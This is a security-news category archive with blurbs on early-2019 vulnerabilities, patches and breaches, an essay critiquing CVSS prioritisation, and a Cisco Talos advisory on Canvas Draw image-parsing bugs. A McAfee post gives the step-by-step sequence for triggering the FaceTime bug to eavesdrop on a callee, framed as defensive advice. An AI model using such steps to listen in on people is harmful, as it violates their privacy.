Category Archives: Vulnerability

Hacking Virtual Reality – Researchers Exploit Popular Bigscreen VR App

A team of cybersecurity researchers from the University of New Haven yesterday released a video demonstrating how vulnerabilities that most programmers often underestimate could have allowed hackers to evade privacy and security of your virtual reality experience as well as the real world. According to the researchers—Ibrahim Baggili, Peter Casey and Martin Vondráček—the underlying

Cisco fixes risky flaws in HyperFlex and Prime infrastructure

Cisco has released another batch of fixes for many of its products, including HyperFlex, Prime infrastructure, WebEx, and Firepower devices. Fixed HyperFlex bugs Five of the patched vulnerabilities affect Cisco HyperFlex Software, software running on Cisco HyperFlex HX-Series data center nodes. Two of them are high risk security holes: CVE-2018-15380 could allow an unauthenticated, adjacent attacker to run commands on the affected host as the root user CVE-2019-1664 could allow an unauthenticated, local attacker to … More

The post Cisco fixes risky flaws in HyperFlex and Prime infrastructure appeared first on Help Net Security.

GitHub Ups the Rewards, Expands the Scope of Its Bug Bounty Program

Web-based hosting service GitHub has decided to increase both the potential reward amounts and scope of its bug bounty program. On 19 February, GitHub announced its decision to raise its reward amounts. Security researchers can now expect to earn a minimum of $617 for reporting a low-severity vulnerability in the service’s products. On the other […]… Read More

The post GitHub Ups the Rewards, Expands the Scope of Its Bug Bounty Program appeared first on The State of Security.

Highly critical Drupal RCE flaw could lead to new Drupalgeddon, patch now!

A new Drupalgeddon might be brewing: a highly critical vulnerability affecting all versions of the popular content management framework could allow hackers to take over vulnerable Drupal installations and the websites running on them. About the vulnerability (CVE-2019-6340) The remote execution flaw exists because some field types do not properly sanitize data from non-form sources and this can be exploited to achieve arbitrary PHP code execution. It is deemed highly critical because it can be … More

The post Highly critical Drupal RCE flaw could lead to new Drupalgeddon, patch now! appeared first on Help Net Security.

Another Critical Flaw in Drupal Discovered — Update Your Site ASAP!

Developers of Drupal—a popular open-source content management system software that powers millions of websites—have released the latest version of their software to patch a critical vulnerability that could allow remote attackers to hack your site. The update came two days after the Drupal security team released an advance security notification of the upcoming patches, giving websites

500,000+ WinRAR users open to compromise via a 19-year-old flaw

A vulnerability affecting all versions of WinRAR, the popular file archiver utility for Windows, could be exploited by attackers to deliver malware via specially crafted ACE archives. About the flaw The vulnerability was unearthed by Check Point researchers and the effectiveness of a PoC exploit has been demonstrated in this video: They created a malicious ACE archive disguised as a RAR file that, when decompressed by WinRAR, extracts a malicious executable to one of the … More

The post 500,000+ WinRAR users open to compromise via a 19-year-old flaw appeared first on Help Net Security.

Cryptocurrency Broker Had 450,000 of its Users Credentials Leaked on The Darkweb

Cryptocurrency broker, Coinmama, suffered a data breach with around 500,000 customers’ emails and password credentials compromised. Customers affected stretch back

Cryptocurrency Broker Had 450,000 of its Users Credentials Leaked on The Darkweb on Latest Hacking News.

Warning: Critical WinRAR Flaw Affects All Versions Released In Last 19 Years

Beware Windows users... a new dangerous remote code execution vulnerability has been discovered in the WinRAR software, affecting hundreds of millions of users worldwide. Cybersecurity researchers at Check Point have disclosed technical details of a critical vulnerability in WinRAR—a popular Windows file compression application with 500 million users worldwide—that affects all versions of the

Smashing Security #116: Stalking debtors, Facebook farce, and a cyber insurance snag

Smashing Security #116: Stalking debtors, Facebook farce, and a cyber insurance snag

How would *you* track someone who owed you money? What was the colossal flaw Facebook left on its website for anyone to exploit and hijack accounts? And what excuse are insurance companies giving for not paying victims of the NotPetya malware millions of dollars?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Joe Carrigan of the Information Security Institute at Johns Hopkins University.

Rockwell Automation industrial energy meter vulnerable to public exploits

A low-skilled, remote attacker could use publicly available exploits to gain access to and mess with a power monitor by Rockwell Automation that is used by energy companies worldwide, ICS-CERT warns. All versions of Rockwell Automation’s Allen-Bradley PowerMonitor 1000 are vulnerable and there is currently no available fix for the flaws. About the vulnerabilities and available exploits PowerMonitor 1000 is an energy metering device used in industrial control applications, such as destribution centers, industrial control … More

The post Rockwell Automation industrial energy meter vulnerable to public exploits appeared first on Help Net Security.

Calling Into Question the CVSS

For almost 15 years now, companies have been using the Common Vulnerability Scoring System (CVSS) to determine the criticality of security vulnerabilities. Ten is the highest score, meaning the most severe, while zero is the lowest. Over time, the CVSS has become something of a de facto industry standard used by most major vendors as well as the National Vulnerability Database (NVD).

CVSS scores were designed to measure the level of severity of an identified vulnerability in relation to where that vulnerability was found. Many organizations have used the scores to prioritize which vulnerabilities to fix first, which is an essential component of vulnerability management. However, the CVSS was never meant to be used on its own for prioritization, and such use has created many debates within the security community, particularly where those assessing risk require more context about vulnerabilities than a technical score.

The CVSS Wasn’t Designed to Measure Risk

In December 2018, the Software Engineering Institute at Carnegie Mellon published a report titled “Towards Improving CVSS.” The authors explain how the CVSS is being misused as a risk score and dive into why the output can be unreliable when prioritizing vulnerability fixes is based solely on the CVSS. A few excerpts from the report align with some of the existing lines of thought about why the CVSS alone is not enough for vulnerability prioritization.

For example, some organizations use the CVSS as the sole driver for prioritizing vulnerability patching policies, while what they truly need is to work on the bigger risk picture, of which the CVSS is but one component of many.

To that effect, the report states, “CVSS is designed to identify the technical severity of a vulnerability. What people seem to want to know, instead, is the risk a vulnerability or flaw poses to them, or how quickly they should respond to a vulnerability. If so, then either CVSS needs to change or the community needs a new system.”

For the most part, IBM Security’s team of veteran hackers, X-Force Red, agrees with that conclusion. A new system is needed, and it should incorporate more risk-focused contextual information when prioritizing which vulnerabilities to fix first. However, it’s important to keep in mind that the CVSS was never meant to measure risk to a certain organization; it was meant to measure the severity of the vulnerability. As such, upending the scoring system isn’t the solution. Instead, we need a new method for prioritizing vulnerabilities that incorporates the CVSS and contextual factors specific to each organization’s environment.

The Components of the CVSS

The CVSS Specification Document states that the CVSS score is composed of three metric groups: base, temporal and environmental. Most published CVSS scores only report the base metric, which describes characteristics of the vulnerability that are constant over time. The temporal group includes exploit code maturity and available remediations that are independent of a particular environment. Finally, the environmental metric can only be assessed with knowledge of the environment where a vulnerable system resides.

The researcher who creates the CVSS for the discovered vulnerability will oftentimes not factor in the environmental score or mark it as “zero” because he or she is not familiar with each individual environment. In order for the environmental score to be taken into account, a security analyst in each affected organization would need to assess his or her environment and change the score. Being that many organizations are strapped with limited resources, time and skill sets, having an analyst who can do this is not likely.

The three metric groups of the CVSS do not account for the risk posed based on the business value of an asset, nor were they ever supposed to. The CVSS is a severity rating, not a risk score. The environmental score can modify the base score by taking into consideration local mitigation factors and configuration details. It can also adjust the impact to an asset’s confidentiality, integrity and availability (CIA) if the vulnerability were exploited. However, it is still a measure of severity and does not consider the value of the exposed asset to the organization, which is a key risk factor.

Contextual Data the CVSS Does Not Consider

For example, consider two different vulnerabilities. One vulnerability has a low impact on the availability of web servers; the other exposes users’ email addresses (low confidentiality). Both could easily have the same CVSS base score of 5.3, but the availability issue may receive an environmental score of 5.8 because it affects a customer service portal and management considers the availability requirement to be high.

Even if the confidentiality issue received a similar adjustment, there is no metric to measure the impact General Data Protection Regulation (GDPR) requirements may add to the risk of exposing customer data, which significantly increases the value of the email addresses. The report backs up this argument, stating: “We have no evidence that CVSS accounts for any of the following: the type of data an information system (typically) processes, the proper operation of the system, the context in which the vulnerable software is used, or the material consequences of an attack.”

The report also highlights that the CVSS does not consider relationships between vulnerabilities that allow an attacker to pivot or escalate privileges as well as security issues that are not strictly defined as vulnerabilities, such as insecure misconfigurations. These all play a role in evaluating risk status and response prioritization.

“In general, severity should only be a part of vulnerability response prioritization,” the report notes. “One might also consider exploit likelihood or whether exploits are publicly available. The Exploit Code Maturity vector (in Temporal Metrics) attempts to address exploit likelihood, but the default value assumes widespread exploitation, which is not realistic.”

The temporal metrics, however, are only designed to lower the base score and are rarely updated, if published at all. Asset value and exploitation are common risk factors and must be considered when prioritizing vulnerabilities.

The Subjective Angle of the CVSS

At X-Force Red, we are hired to break into organizations to uncover risky vulnerabilities that criminal attackers may use for their gain. Our team works with a plethora of vulnerabilities on a daily basis, and we do agree that while the CVSS has its role, it should not be the only factor in determining how to prioritize vulnerabilities. Two of the factors that need a more objective metric are the potential for exploitation and the criticality of the asset.

Let’s consider the fact that CVSS scores are assigned by vendors or researchers at a point in time and rarely rescored as circumstances change. For example, the temporal metric, if considered at all, is based on exploitation that is known at the time. As a result, CVSS scores can be more subjective and may not consider critical context around the assets the vulnerability is exposing, or whether criminals are actively weaponizing the vulnerability.

When it comes to using the CVSS to prioritize response to vulnerabilities, our X-Force Red hackers have seen time and time again vulnerabilities with CVSS scores of 10 bumped to the top of the priority list even though the assets they could affect would only cause minimal impact to the business if they were compromised. High scores were also attributed to vulnerabilities even when criminals were not exploiting them in the wild at that time.

Meanwhile, vulnerabilities with CVSS scores of 5 sit lower on the priority list even though they could expose high-value assets and are being actively weaponized by criminals. As a result, the vulnerability scored as 10 gets fixed first, leaving criminals ample time to exploit the more detrimental issues that scored a mere 5.

CVSS score

Figure 1: This graphic shows that even though the vulnerability MS17-010 has the most correlated exploits (41), it still sits lower on the priority list because it has a lower CVSS score. Meanwhile, the vulnerability at the top of the list has fewer correlated exploits yet has a CVSS score of 10.

Striking a New Balance With Vulnerability Prioritization

At X-Force Red, we believe vulnerabilities should be ranked based on the importance of the exposed asset to the organization and whether the vulnerability is being weaponized by criminals.

To help security professionals prioritize remediation, our team built a proprietary algorithm, which is part of X-Force Red’s Vulnerability Management Services (VMS). This algorithm automatically prioritizes vulnerabilities considering those contextual factors — asset value and whether the vulnerability is being weaponized — in addition to the CVSS score.

With X-Force Red Vulnerability Management Services, the chart above would look like this:


Vulnerability prioritization matrix using X-Force Red's VMS

Figure 2: Vulnerability prioritization matrix when using X-Force Red’s VMS. Notice the vulnerability with the most correlated exploits — MS17-010 — is at the top even though the CVSS score is lower than others on the list.

Consider the risk equation, which, depending on who you ask, may vary. While the classic risk calculation is risk = likelihood x impact, some risk experts describe it as:

Risk = threat + vulnerability + asset of value.

Without a threat exploiting a vulnerability, the risk should definitely be scored lower. If the vulnerability doesn’t affect an asset of value, it should not rank highest on the prioritization list until that situation changes.

By considering the impact to the business, if the exposed asset were compromised, and if the vulnerability is being exploited, vulnerabilities could be prioritized based on the actual risk to critical assets, data or business operations. It is this sort of context we would like to bring into the vulnerability factor of the overall risk equation.

Learn more about X-Force Red Vulnerability Management Services

The post Calling Into Question the CVSS appeared first on Security Intelligence.

Flawed password managers allow malware to steal passwords from computer memory

The most widely used password managers sport fundamental vulnerabilities that could allow malware to steal the master password or other passwords stored by the software directly from the computer’s memory, researchers with Independent Security Evaluators (ISE) have found. The findings They tested the 1Password, Dashlane, KeePass and LastPass password manager applications for Windows, which are collectively used by 60 million users and 93,000 businesses worldwide. They reverse engineered each software package to evaluate its handling … More

The post Flawed password managers allow malware to steal passwords from computer memory appeared first on Help Net Security.

Critical Flaw Uncovered In WordPress That Remained Unpatched for 6 Years

Exclusive — If you have not updated your website to the latest WordPress version 5.0.3, it’s a brilliant idea to upgrade the content management software of your site now. From now, I mean immediately. Cybersecurity researchers at RIPS Technologies GmbH today shared their latest research with The Hacker News, revealing the existence of a critical remote code execution vulnerability that

Docker Container Escape Vulnerability With PoC (CVE-2019-5736)

A runtime used to support Docker and Linux container engines suffered a vulnerability the past few days. An attack could

Docker Container Escape Vulnerability With PoC (CVE-2019-5736) on Latest Hacking News.

Vulnerability In Xiaomi Electric Scooters Allows Attackers to Take Control of the Machine

Electric scooters have proved to be a convenient form of travel for some over short distances. Security researchers have highlighted

Vulnerability In Xiaomi Electric Scooters Allows Attackers to Take Control of the Machine on Latest Hacking News.

Another Commercial WordPress Plugin Gets Exploited

In the past few months, commercial WordPress plugin WP Cost Estimation has been under attack from hackers. These hackers are

Another Commercial WordPress Plugin Gets Exploited on Latest Hacking News.

Microsoft February Patch Tuesday Addressed A Zero Day And Numerous Critical Bugs

In January, Microsoft’s scheduled updates fixed numerous security flaws that included some few critical ones. However, with Microsoft February Patch

Microsoft February Patch Tuesday Addressed A Zero Day And Numerous Critical Bugs on Latest Hacking News.

A Further 127 Million User Records Found For Sale on The Dark Web

Earlier this week, this site reported an individual who was selling 620 million user records he claimed had stolen from

A Further 127 Million User Records Found For Sale on The Dark Web on Latest Hacking News.

Critical Vulnerabilities Addressed In Adobe February Patch Tuesday

In the February’s monthly scheduled updates, Adobe has once again fixed a number of security flaws. The Adobe February Patch

Critical Vulnerabilities Addressed In Adobe February Patch Tuesday on Latest Hacking News.

Google Play Store Malicious App Detection Up By Over 50%

In Google’s mid-year review which was announced on Wednesday, they said that Google Play Store app rejections went up 55%

Google Play Store Malicious App Detection Up By Over 50% on Latest Hacking News.

Credential Stuffing Scammer Lists 620 Million Records on the Dark Web

Credential stuffing scams are becoming more prevalent and companies are increasingly seeing their customers accounts hacked. In the past three

Credential Stuffing Scammer Lists 620 Million Records on the Dark Web on Latest Hacking News.

Google Reveals How Much They Paid Out Under Their Bug Bounty Program in 2018

In 2010, Google launched its Vulnerability Reward Program (VRP) to help them identify bugs and other problems with their apps

Google Reveals How Much They Paid Out Under Their Bug Bounty Program in 2018 on Latest Hacking News.

Snapd Flaw Lets Attackers Gain Root Access On Linux Systems

Ubuntu and some other Linux distributions suffer from a severe privilege escalation vulnerability that could allow a local attacker or a malicious program to obtain root privileges and total control over the targeted system. Dubbed "Dirty_Sock" and identified as CVE-2019-7304, the vulnerability was discovered by security researcher Chris Moberly, who privately disclosed it to Canonical, the

Dunkin Donuts Victim of Second Cyber Attack in Three Months

Coffee shop chain Dunkin’ Donuts has announced that it has become the victim of a second cyber attack within three

Dunkin Donuts Victim of Second Cyber Attack in Three Months on Latest Hacking News.

Snapd flaw gives attackers root access on Linux systems

A vulnerability affecting Snapd – a package installed by default in Ubuntu and used by other Linux distributions such as Debian, OpenSUSE, Arch Linux, Fedora and Solus – may allow a local attacker to obtain administrator privileges, i.e., root access and total control of the system. About Snapd Snapd is a service used to deliver, update and manage apps (in the form of snap packages) on Linux distributions. “This service is installed automatically in Ubuntu … More

The post Snapd flaw gives attackers root access on Linux systems appeared first on Help Net Security.

Hacked User Finds $500 Worth of Food Ordered From Their McDonald’s App

Ordering food through an app on a mobile phone has become an increasingly popular way to satisfy the appetite. However,

Hacked User Finds $500 Worth of Food Ordered From Their McDonald’s App on Latest Hacking News.

VFEmail suffers ‘catastrophic’ attack, as hacker wipes email service’s primary and backup data

VFEmail suffers 'catastrophic' attack, as hacker wipes email service's primary and backup data

There will be many angry customers of VFEmail who will be distraught at the thought that years’ worth of irreplaceable personal and business correspondence may have been wiped out. It’s understandable that some might turn their fury towards VFEmail.

But VFEmail is a victim too.

RunC container escape flaw enables root access to host system

A serious vulnerability in runC, a widely used CLI tool for spawning and running containers, could be exploited to compromise the runC host binary from inside a privileged runC container, allowing the attacker to gain root access on the underlying host system. RunC is the container runtime underneath infrastructure and engines such as Docker, CRI-O, containerd, Kubernetes, etc. About the vulnerability (CVE-2019-5736) CVE-2019-5736 was reported by researchers Adam Iwaniuk and Borys Popławski to runC maintainers, … More

The post RunC container escape flaw enables root access to host system appeared first on Help Net Security.

Critical zero-day vulnerabilities hit Lifesize video conferencing products

By Waqas

The IT security researchers at TrustWave have discovered critical zero-day vulnerabilities in video conferencing products developed by Lifesize which, if exploited by attackers can cause a great deal of damage. Lifesize is an audio and video telecommunication firm based in the United States with offices in Africa, Europe, and the Middle East. Its products are used by […]

This is a post from HackRead.com Read the original post: Critical zero-day vulnerabilities hit Lifesize video conferencing products

Swiss Government Invites Hackers to Pen Test Their Voting System

The Swiss government is eager to ensure that its e-voting system is safe and secure for those casting their votes.

Swiss Government Invites Hackers to Pen Test Their Voting System on Latest Hacking News.

Bleichenbacher Oracle Attack Variation Subjects TLS Encryption To Further Vulnerabilities

Encryption is one of the safest forms of securing data; yet academics recently found a vulnerability that allowed attackers to

Bleichenbacher Oracle Attack Variation Subjects TLS Encryption To Further Vulnerabilities on Latest Hacking News.

Mumsnet Data Leak Baffled Parents As Cloud Migration Exposed Users’ Personal Data

Another day, another breach. This time, the incident has troubled thousands of parents as it affected parenting forum Mumsnet. Reportedly,

Mumsnet Data Leak Baffled Parents As Cloud Migration Exposed Users’ Personal Data on Latest Hacking News.

Apple Security updates released for Facetime bugs

A recently reported bug in Facetime, caused privacy concerns last month as individuals were able to eavesdrop on users.  The

Apple Security updates released for Facetime bugs on Latest Hacking News.

PNG Image File Security Flaw Could Give Hackers Access to Your Android Phone

Most people will get pictures of cute animals and other funny memes sent to them throughout the day. In many

PNG Image File Security Flaw Could Give Hackers Access to Your Android Phone on Latest Hacking News.

Multiple Airline Check-In Systems Exposing Passenger Data

Given the high security at the airport, it would be logical to assume that airlines are tough with the security

Multiple Airline Check-In Systems Exposing Passenger Data on Latest Hacking News.

Pen Testing Firm Claims 92% Successful Breach Rate of Their Clients

On the 6 February, cyber-security firm Positive Technologies published its penetration testing activity report for 2018. The firm claimed that

Pen Testing Firm Claims 92% Successful Breach Rate of Their Clients on Latest Hacking News.

Latest iOS 12.1.4 Update Patches 2 Zero-Day and FaceTime Bugs

Apple has finally released iOS 12.1.4 software update to patch the terrible Group FaceTime privacy bug that could have allowed an Apple user to call you via the FaceTime video chat service and hear or see you before you even pick up the call without your knowledge. The Facetime bug (CVE-2019-6223) was discovered by 14-year-old Grant Thompson of Catalina Foothills High School while he was

Jack’d Dating App Allowing Strangers to See Intimate Photos

Dating sites can sometimes contain photos that the users don’t want everyone to see. However, dating and hook-up app Jack’d

Jack’d Dating App Allowing Strangers to See Intimate Photos on Latest Hacking News.

Malicious macros can trigger RCE in LibreOffice, OpenOffice

Achieving remote code execution on systems running LibreOffice or Apache OpenOffice might be as easy as tricking users into opening a malicious ODT (OpenDocument) file and moving their mouse over it, a security researcher has found. About CVE-2018-16858 CVE-2018-16858 takes advantage of a LibreOffice feature where documents can specify that pre-installed macros can be executed on various document events (e.g. mouse-over-object). “Prior to 6.0.7/6.1.3 LibreOffice was vulnerable to a directory traversal attack where it was … More

The post Malicious macros can trigger RCE in LibreOffice, OpenOffice appeared first on Help Net Security.

The problem with vulnerable IoT companion apps

There’s no shortage of exploitable security holes in widely used Internet of Things devices, so it shouldn’t come as a surprise that the communication between many of those devices and their companion apps is not encrypted. The research A group of researchers from Brazil’s Federal University of Pernambuco and the University of Michigan have analyzed 32 unique companion Android apps for 96 WiFi and Bluetooth-enabled devices popular on Amazon. They searched for answers to the … More

The post The problem with vulnerable IoT companion apps appeared first on Help Net Security.

Smashing Security #114: Darknet Diaries, death, and beauty apps

Smashing Security #114: Darknet Diaries, death, and beauty apps

Jack Rhysider from the “Darknet Diaries” podcast joins us to chat about his interview with the elusive Hacker Giraffe, how a death is preventing cryptocurrency investors from reaching their money, and how ‘beauty camera’ apps are redirecting users to phishing websites and stealing their selfies.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast hosted by computer security veterans Graham Cluley and Carole Theriault.

Flaws in RDP protocols leaving machines prone to remote code execution

By Waqas

Major Security Flaws Identified in RDP Protocols making Machines Prone to Remote Code Execution and Reverse RDP Attacks. Check Point researchers have identified that three remote desktop protocol (RDP) tools, which are probably the most popular ones for Windows, macOS, and Linux systems, are plagued with not one or two but twenty-five CVE-listed security flaws. […]

This is a post from HackRead.com Read the original post: Flaws in RDP protocols leaving machines prone to remote code execution

Android Phones Can Get Hacked Just by Looking at a PNG Image

Using an Android device? Beware! You have to remain more caution while opening an image file on your smartphone—downloaded anywhere from the Internet or received through messaging or email apps. Yes, just viewing an innocuous-looking image could hack your Android smartphone—thanks to three newly-discovered critical vulnerabilities that affect millions of devices running recent versions of

14 Essential Bug Bounty Programs of 2019

In 2017, The State of Security published its most recent list of essential bug bounty frameworks. Numerous organizations and government entities have launched their own vulnerability reward programs (VRPs) since then. With that in mind, I think it’s time for an updated list. Here are 14 essential bug bounty programs for 2019. Apple Website: Invite-only […]… Read More

The post 14 Essential Bug Bounty Programs of 2019 appeared first on The State of Security.

Critical Zcash Bug Could Have Allowed ‘Infinite Counterfeit’ Cryptocurrency

The developers behind the privacy-minded Zcash cryptocurrency have recently discovered and patched a highly dangerous vulnerability in the most secretive way that could have allowed an attacker to coin an infinite number of Zcash (ZEC). Yes, infinite… like a never-ending source of money. Launched in October 2016, Zcash is a privacy-oriented cryptocurrency that claims to be more anonymous

Flaws in Popular RDP Clients Allow Malicious Servers to Reverse Hack PCs

You've always been warned not to share remote access to your computer with any untrusted people for many reasons—it's basic cyber security advice, and common sense, right? But what if I say, you should not even trust anyone who invites or offers you full remote access to their computers? Security researchers at cybersecurity firm Check Point have discovered more than two dozen

Severe RCE Flaw Disclosed in Popular LibreOffice and OpenOffice Software

It's 2019, and just opening an innocent looking office document file on your system can still allow hackers to compromise your computer. No, I'm not talking about yet another vulnerability in Microsoft Office, but in two other most popular alternatives—LibreOffice and Apache OpenOffice—free, open source office software used by millions of Windows, MacOS and Linux users. Security researcher

Hacker Who Discovered Flaw in Magyar Telekom Faces 8-Year Jail Term

Not all hackers are intent on stealing data or victimising users. Some use their skills to try and disclose vulnerabilities

Hacker Who Discovered Flaw in Magyar Telekom Faces 8-Year Jail Term on Latest Hacking News.

IBM Discovers Malicious Use of Apple Siri Shortcuts App

In iOS 12, Apple implemented the use of Shortcuts App into its voice assistant Siri. These shortcuts are designed to help

IBM Discovers Malicious Use of Apple Siri Shortcuts App on Latest Hacking News.

Home Remodelling Website Houzz Suffers a Data Breach

The popular home remodelling website Houzz has informed its customers that it suffered a data breach. This breach is thought to

Home Remodelling Website Houzz Suffers a Data Breach on Latest Hacking News.

Firefox 65 Released With Better Ad Tracker Blocking And Multiple Security Fixes

Mozilla has rolled out the latest version of its Firefox Quantum with various feature uplifts. The new Firefox 65 not

Firefox 65 Released With Better Ad Tracker Blocking And Multiple Security Fixes on Latest Hacking News.

Hacker who reported flaw in Hungarian Telekom faces up to 8-years in prison

Many of you might have this question in your mind: "Is it illegal to test a website for vulnerability without permission from the owner?" Or… "Is it illegal to disclose a vulnerability publicly?" Well, the answer is YES, it’s illegal most of the times and doing so could backfire even when you have good intentions. Last year, Hungarian police arrested a 20-year-old ethical hacker accused of

Canonical Updates Ubuntu 18.04 While Patching Numerous Other Security Flaws

Canonical has released updates for Ubuntu 18.04. The updates include patches for numerous security vulnerabilities in the Linux Kernel. Ubuntu

Canonical Updates Ubuntu 18.04 While Patching Numerous Other Security Flaws on Latest Hacking News.

Smashing Security #113: FaceTime, Facebook, faceplant

Smashing Security #113: FaceTime, Facebook, faceplant

FaceTime bug allows callers to see and hear you *before* you answer the phone, Facebook’s Nick Clegg tries to convince us the social network is changing its ways, and IoT hacking is big in Japan.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes from AMTSO.

Vulnerability Spotlight: Multiple vulnerabilities in ACD Systems Canvas Draw 5


Tyler Bohan of Cisco Talos discovered these vulnerabilities. Vanja Svajcer authored this blog post.

Cisco Talos is disclosing several vulnerabilities in ACD Systems' Canvas Draw 5, a graphics-editing tool for Mac. The vulnerable component of Canvas Draw 5 lies in the handling of TIFF and PCX images. TIFF is a raster-based image format used in graphics editing projects, thus making it a very common file format that's used in Canvas Draw. PCX was a popular image format with early computers, and although it's been replaced by more sophisticated formats, it is still in use and fully supported by Canvas Draw.

In accordance with our coordinated disclosure policy, Cisco Talos worked with ACD Systems to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability Details

ACD Systems Canvas Draw 5 FillSpan out-of-bounds write code execution vulnerability (TALOS-2018-0638/CVE-2018-3973) 

TALOS-2018-0638 is an exploitable out-of-bounds write vulnerability that exists in the TIFF-parsing function of Canvas Draw, version 5.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution.

An address influenced by the parsed image is loaded into a register and the lower four bytes are then zeroed out in memory. When this value is used later in function `DIB_resolution_set`, it causes an out-of-bounds write and an exploitable condition to arise.

For more information, read the full advisory here.

ACD Systems Canvas Draw 5 IO metadata out-of-bounds write code execution vulnerability (TALOS-2018-0642/CVE-2018-3976)

TALOS-2018-0642 is an exploitable out-of-bounds write vulnerability that exists in the CALS Raster file format parsing function of Canvas Draw, version 5.0.0.28. A specially crafted CAL image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a CAL image to trigger this vulnerability and gain code execution.

The vulnerability arises in the parsing of the CALS Raster file format, specifically dealing with the column and row sizes of an image. Inside of the CALS header, values are set to determine the location of image data and the size of the image itself. By passing in incorrect values, the application will write out of array bounds, attempting to access the image data.

For more information, read the full advisory here.

ACD Systems Canvas Draw 5 huff table out-of-bounds write code execution vulnerability (TALOS-2018-0648/CVE-2018-3980)

TALOS-2018-0648 is an exploitable out-of-bounds write vulnerability that exists in the TIFF parsing functionality of Canvas Draw, version 5.0.0.

The vulnerability arises in the parsing of a tiled TIFF image with the Adobe Deflate compression scheme. This compression algorithm is not part of the TIFF standard algorithms but was added as an extension from Adobe and uses a lossless Deflate compression scheme utilizing the zlib compressed data format. The Canvas Draw application supports this compression format and is able to handle files using it.

The vulnerability may be triggered while attempting to build a Huffman table. Huffman coding is one of the two things that make up the deflate encoding scheme. When using the deflate encoding scheme the application takes user data directly from the TIFF image without validation.

For more information, read the full advisory here.

ACD Systems Canvas Draw 5 Resoultion_Set out-of-bounds write code execution vulnerability (TALOS-2018-0649/CVE-2018-3981)

TALOS-2018-0649 is an exploitable out-of-bounds write vulnerability that exists in the TIFF parsing functionality of Canvas Draw version 5.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution.

The vulnerability arises in the parsing of a tiled TIFF image with a specially crafted resolution tag and data. A user influenced address is loaded into a processor register and the lower four bytes are then zeroed out in memory. This value is used later in `DIB_resolution_set` function, where it causes an out-of-bounds write and an exploitable condition to arise.

For more information, read the full advisory here.

Affected versions

The vulnerabilities are confirmed in the Canvas Draw version 5.0.0.28, but they may also be present in the earlier versions of the product. Users are advised to apply the latest security update for their version.

Conclusion

Familiar file formats that are routinely shared in a work environment make tempting targets for attackers as the targets not may consider familiar image files as being potentially malicious. The TIFF and PCX file formats are regularly used in the graphic design industry and for the distribution of certain documents such as fax messages.

The complexity of image file formats means there are ample opportunities for vulnerabilities to be inadvertently included in programs that parse them.



Coverage

The following SNORT® rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.

Snort rules: 39593 - 39596, 39599 - 39632, 47336, 47337

Scammers Steal Social Media Videos For Fake Fundraising Accounts

Earlier this month, a 4-year-old girl called Maya Tisdale was videoed by her parents taking her first independent steps. Maya was

Scammers Steal Social Media Videos For Fake Fundraising Accounts on Latest Hacking News.

Apple Users: Here’s What to Do About the Major FaceTime Bug

FaceTime is a popular way for people of all ages to connect with long-distance loved ones. The feature permits Apple users to video chat with other device owners from essentially anywhere at any time. And now, a bug in the software takes that connection a step further – as it permits users calling via FaceTime to hear the audio coming from the recipient’s phone, even before they’ve accepted or denied the call.

Let’s start with how the eavesdropping bug actually works. First, a user would have to start a FaceTime video call with an iPhone contact and while the call is dialing, they must swipe up from the bottom of the screen and tap “Add Person.” Then, they can add their own phone number to the “Add Person” screen. From there, the user can start a group FaceTime call between themselves and the original person dialed, even if that person hasn’t accepted the call. What’s more – if the user presses the volume up or down, the victim’s front-face camera is exposed too.

This bug acts as a reminder that these days your smartphone is just as data rich as your computer. So, as we adopt new technology into our everyday lives, we all must consider how these emerging technology trends could create security risks if we don’t take steps to protect our data.

Therefore, it’s crucial all iOS users that are running iOS 12.1 or later take the right steps now to protect their device and their data. If you’re an Apple user affected by this bug, be sure to follow these helpful security steps:

  • Update, update, update. Speaking of fixes – patches for bugs are included in software updates that come from the provider. Therefore, make sure you always update your device as soon as one is available. Apple has already confirmed that a fix is underway as we speak.
  • Be sure to disable FaceTime in iOS settings now. Until this bug is fixed, it is best to just disable the feature entirely to be sure no one is listening in on you. When a fix does emerge from Apple, you can look into enabling the service again.
  • Apply additional security to your phone. Though the bug will hopefully be patched within the next software update, it doesn’t hurt to always cover your device with an extra layer of security. To protect your phone from any additional mobile threats coming its way, be sure to use a security solution such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Apple Users: Here’s What to Do About the Major FaceTime Bug appeared first on McAfee Blogs.

Critical FaceTime bug turns iPhones, Macs into eavesdropping tools

A shocking and easily exploitable FaceTime bug allows people to listen in on other users of Apple devices by simply calling them through the service. The bug apparently affects Group FaceTime and Apple has reacted by making the service unavailable until they can push out a fix. Exploitation of the FaceTime bug The bug was first reported by 9to5Mac and then replicated and confirmed by others. The gist of it is this: it allows the … More

The post Critical FaceTime bug turns iPhones, Macs into eavesdropping tools appeared first on Help Net Security.

A week in security (January 21 – 27)

Last week on the Malwarebytes Labs blog, we took a look at Modlishka, the latest hurdle in two-factor authentication (2FA), the potential for abuse of push notifications, a malware-phishing combo by the name of CryTekk ransomware, and why we detect PUPs, but enforce the power of users’ choice.

We also pushed out the 2019 State of Malware report, which you can readily download here.

Other cybersecurity news

  • Fortnight, the hugely popular video game, uses in-game currency. And this, The Independent has found, is fueling money laundering schemes. (Source: PYMNTS.com)
  • Thanks to the new European General Data Protection Regulation (GDPR) privacy law, a French regulator fined Google to the tune of €50 million ($56.8 million) for not getting enough user consent to data collection and targeted advertising. (Source: The Wall Street Journal)
  • A clever mobile malware affected Android devices is able to elude emulators, tools which are used by security researchers to study potentially malicious apps, by running only when it detects the that device it’s installed in moves. (Source: Ars Technica)
